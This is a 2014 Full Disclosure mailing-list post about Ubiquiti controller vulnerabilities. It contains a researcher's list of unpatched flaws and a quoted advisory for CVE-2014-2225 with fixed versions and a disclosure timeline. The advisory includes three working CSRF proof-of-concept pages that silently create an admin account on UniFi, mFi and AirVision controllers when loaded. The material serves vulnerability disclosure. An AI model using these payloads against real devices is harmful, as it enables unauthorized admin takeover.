This is interesting. Ubiquiti knew about this issue since last year. On 26 Sep 2013, I reported to them the following vulnerabilities affecting UniFi Controller:
http://www.ikkisoft.com/stuff/UnifiSecurityBugs_Sep2013.pdf #1 Insecure Java Random() to generate secret tokens This was fixed in 3.1.5 as "security enhancements". See http://pastebin.com/Xt0hVCPr for the change log. java.util.Random was used across the entire codebase to generate secret tokens, such as session cookies, AP auth keys and reset tokens. Under some circumstances, it was practical to predict the reset password token and compromise the admin account, which would lead to full compromise of the entire platform. #2 System-wise Cross Site Request Forgery In addition to the pdf detailing the vulns, I've shared with them a PoC with the exact same attack. After a few emails, trying to explain the criticality of CSRF in this context, I simply gave up. #3 Change password does not require old password #4 Frameable response (ClickJacking) #5 Credentials are saved in plain-text within MongoDB #6 Multiple Cross-Site Scripting vulnerabilities (Stored and Reflected) in /api/, abusing IE content sniffing As far as I know, these are still open. In addition, I've asked them to obtain CVEs for those vulnerabilities. On Oct 30th, they confirmed that they would be disclosed to be public: "Good point about CVE, we'll request an ID and disclose them later. Will also address V2." I don't think that CVEs have ever been assigned to these issues, neither Ubiquiti has published those details in a security advisory. Cheers! @_ikki On Wed, Jul 23, 2014 at 8:58 PM, Seth Art <[email protected]> wrote: > ----------- > Vendor: > ----------- > Ubiquiti Networks (http://www.ubnt.com/) > > ----------------------------------------- > Affected Products/Versions: > ----------------------------------------- > UniFi Controller v2.4.6 > mFi Controller v2.0.15 > AirVision Controller v2.1.3 > Note: Previous versions may be affected > > ----------------- > Description: > ----------------- > Title: Cross-site Request Forgery (CSRF) > CVE: CVE-2014-2225 > CWE: http://cwe.mitre.org/data/definitions/352.html > Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html > Researcher: Seth Art - @sethsec > > --------------- > UniFi POC: > --------------- > > <html> > <head> > <script> > function sendCSRF() > { > var url_base = "https://192.168.0.106:8443/api/add/admin"; > var > post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D" > > var xmlhttp; > xmlhttp = new XMLHttpRequest(); > xmlhttp.open("POST", url_base, true); > xmlhttp.setRequestHeader("Accept","*/*"); > xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; > charset=UTF-8"); > xmlhttp.withCredentials= "true"; > xmlhttp.send(post_data); > } > > </script> > </head> > <body> > <h1>CSRF POC</h1> > Sending CSRF Payload!!! > <body onload="sendCSRF()"> > </body> > > ------------- > mFi POC: > ------------- > <html> > <head> > <script> > function sendCSRF() > { > var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"; > var > post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D" > > var xmlhttp; > xmlhttp = new XMLHttpRequest(); > xmlhttp.open("POST", url_base, true); > xmlhttp.setRequestHeader("Accept","*/*"); > xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded; > charset=UTF-8"); > xmlhttp.withCredentials= "true"; > xmlhttp.send(post_data); > } > > </script> > </head> > <body> > <h1>CSRF POC</h1> > Sending CSRF Payload!!! > <body onload="sendCSRF()"> > </body> > > > -------------------- > AirVision POC: > -------------------- > <html> > <head> > <script> > function sendCSRF() > { > var url_base = "https://192.168.0.106:7443/api/v2.0/admin"; > var > post_data="{\”name\”:\”csrf\”,\”email\”:\”[email protected]\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}” > > var xmlhttp; > xmlhttp = new XMLHttpRequest(); > xmlhttp.open("POST", url_base, true); > xmlhttp.setRequestHeader("Accept","*/*"); > xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8"); > xmlhttp.withCredentials= "true"; > xmlhttp.send(post_data); > } > > </script> > </head> > <body> > <h1>CSRF POC</h1> > Sending CSRF Payload!!! > <body onload="sendCSRF()"> > </body> > > > > ------------- > Solution: > ------------- > UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater > mFi Controller - Upgrade to mFi Controller v2.0.24 or greater > AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note: > The application name changed from AirVision to UniFi Video) > > ----------------------------- > Disclosure Timeline: > ----------------------------- > 2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products > 2014-02-17: Ubiquiti acknowledges and requests details > 2014-02-17: Report with POC sent to Ubiquiti > 2014-02-19: Asked Ubiquiti to confirm receipt of report > 2014-02-19: Ubiquti confirms receipt of report and existence of the > vulnerabilities > 2014-02-25: Notified Ubiquiti of CSRF vulnerability in AirVision product > 2014-02-19: Ubiquti confirms receipt of AirVision report and existence > of the vulnerability > 2014-02-28: CVE-2014-2225 assigned > 2014-03-12: Requested status update > 2014-03-27: Requested status update > 2014-04-07: Requested status update, mention that we might need to > bring in a CERT > 2014-04-09: Ubiquiti provides timeline for solution > 2014-04-18: UniFi Video 3.0.1 is released > 2014-05-30: Requested a status update on the remaining two products > 2014-06-12: Requested a status update on the remaining two products > 2014-06-12: mFi v2.0.24 and UniFi 3.2.1 are released > 2014-06-13: Set public disclosure date of 2014-07-24 and notified vendor > 2014-07-24: Public disclosure _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
